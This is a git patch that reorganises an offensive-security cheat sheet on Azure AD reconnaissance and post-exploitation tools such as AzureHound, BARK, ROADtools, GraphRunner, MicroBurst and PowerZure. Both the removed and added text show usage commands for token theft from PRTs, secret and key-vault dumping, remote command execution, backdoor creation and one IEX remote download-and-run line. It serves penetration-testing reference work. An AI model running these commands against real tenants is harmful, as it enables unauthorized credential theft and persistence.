From 0dd1cc6ac637e24a7d7bd162d577f03e8ca71c05 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 1 Dec 2023 15:34:14 +0100 Subject: [PATCH] Azure AD - Collectors --- docs/cloud/azure/Cloud - Azure Pentest.md | 152 ---------------------- docs/cloud/azure/azure-enumeration.md | 40 +++++- 2 files changed, 38 insertions(+), 154 deletions(-) delete mode 100644 docs/cloud/azure/Cloud - Azure Pentest.md diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md deleted file mode 100644 index c60ee5b..0000000 --- a/docs/cloud/azure/Cloud - Azure Pentest.md +++ /dev/null @@ -1,152 +0,0 @@ -## Azure Recon Tools - -* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound - ```powershell - # First, retrieve a refresh token (-r) if username/password isn't supported. - # An access token (-j) isn't recommended because it can expire before the end of azurehound execution - Install-Module AADInternals -Scope CurrentUser - Import-Module AADInternals - $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] - - # Second, launch azurehound collector - ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json - - ## Connects on your Azure account using the refresh token provided and the tenant of the account - ## and collects every possible objects in contoso.microsoft.com. Results are stored in json - ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" - ## Sets configuration file with connection variables and other things (not required) - ./azurehound configure - ## Collects every objects on all accessible tenants using username/password and prints it to stdout - ./azurehound -u "MattNelson@contoso.onmicrosoft.com" -p "MyVerySecurePassword123" --tenant "contoso.onmicrosoft.com" list - ## Collects every objects on a specific tenant using username/password and stores it in json - ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" - ## Collects every objects on all tenants accessible using Service Principal secret - ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list - ## Collects AzureAD info (all except AzureRM info) using JWT access token - ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad - ## Collects every users using refresh token - ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users - - # List of collections - az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. - az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. - - apps: Collects AzureAD application registration objects. - devices: Collects AzureAD devices regardless of join type. - groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. - key-vaults: Collects AzureRM key vaults. - management-groups: Collects AzureRM management group objects - resource-groups: Collects AzureRM resource group objects - roles: Collects AzureAD admin role objects - service-principals: Collects AzureAD service principals - subscriptions: Collevts AzureRM subscriptions - tenants: Collevts AzureAD tenant objects - users: Collects AzureAD users, including any guest users in the target tenant. - virtual-machines: Collects AzureRM virtual machines - - # GUI access - bolt://localhost:7687 - Username: neo4j - Password: BloodHound - - # Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/ - # Cypher query examples: - MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p - MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname - ``` -* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit - ```ps1 - . .\BARK.ps1 - $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" - $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" - $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress - ``` -* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. - ```powershell - pipenv shell - roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] - roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] - roadrecon auth -u test@.onmicrosoft.com -p - roadrecon gather - roadrecon gui - ``` -* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects - ```powershell - # session 1 - backend - pipenv shell - python ssbackend.pyz - - # session 2 - frontend - cd C:\Tools\stormspotter\frontend\dist\spa\ - quasar.cmd serve -p 9091 --history - - # session 3 - collector - pipenv shell - az login -u test@.onmicrosoft.com -p - python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli - - # Web access on http://localhost:9091 - Username: neo4j - Password: BloodHound - Server: bolt://localhost:7687 - ``` -* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites -* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. - ```powershell - # You should use an account with at least read-permission on the assets you want to access - PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File - PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT - PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 - PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 - # resolve the TenantID for an specific username - PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com - ``` -* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud. - ```powershell - git submodule init - git submodule update - PS> Import-Module AzureRM - PS> Import-Module AzuriteExplorer.ps1 - PS> Review-AzureRmSubscription - PS> Review-CustomAzureRmSubscription - ``` -* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping - ```powershell - PS C:> Import-Module .\MicroBurst.psm1 - PS C:> Import-Module .\Get-AzureDomainInfo.ps1 - PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose - ``` -* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. - Require: - - Read-Only permissions over Azure Directory (Tenant) - - Read-Only permissions over Subscription - - Require AZ and AzureAD module or administrator right - - ```powershell - $ powershell -ExecutionPolicy Bypass -NoProfile - PS C> Import-Module .\SkyArk.ps1 -force - PS C> Start-AzureStealth - PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') - PS C> Scan-AzureAdmins -* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security - ```powershell - # Require az module ! - $ ipmo .\PowerZure - $ Set-Subscription -Id [idgoeshere] - - # Reader - $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails - - # Contributor - $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" - $ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml" - $ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents - $ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk - - # Owner - $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest - - # Administrator - $ Create-Backdoor, Execute-Backdoor - ``` -* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API \ No newline at end of file diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index 0131259..a623752 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -2,16 +2,52 @@ ## Azure AD - Collectors -* roadrecon +* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites +* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes ```ps1 roadrecon auth --access-token eyJ0eXA... roadrecon auth --prt-cookie -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2" roadrecon gather + roadrecon gui ``` -* AzureHound +* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound ```ps1 ./azurehound --refresh-token list --tenant "" -o output.json + ./azurehound -u "@contoso.onmicrosoft.com" -p "" list groups --tenant ".onmicrosoft.com" + ./azurehound -j "" list users --tenant ".onmicrosoft.com" ``` +* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit + ```ps1 + . .\BARK.ps1 + $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" + $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" + $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress + ``` +* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API + ```ps1 + Invoke-GraphRecon -Tokens $tokens -PermissionEnum + Invoke-DumpCAPS -Tokens $tokens -ResolveGuids + Invoke-DumpApps -Tokens $tokens + Get-DynamicGroups -Tokens $tokens + ``` +* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping + ```powershell + PS C:> Import-Module .\MicroBurst.psm1 + PS C:> Import-Module .\Get-AzureDomainInfo.ps1 + PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose + ``` +* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security + ```powershell + PS C:> Import-Module .\Powerzure.psd1 + PS C:> Set-Subscription -Id [idgoeshere] + PS C:> Get-AzureTarget + PS C:> Get-AzureInTuneScript + PS C:> Show-AzureKeyVaultContent -All + ``` +* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects +* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. +* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud. +* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. ## Azure AD - User Enumeration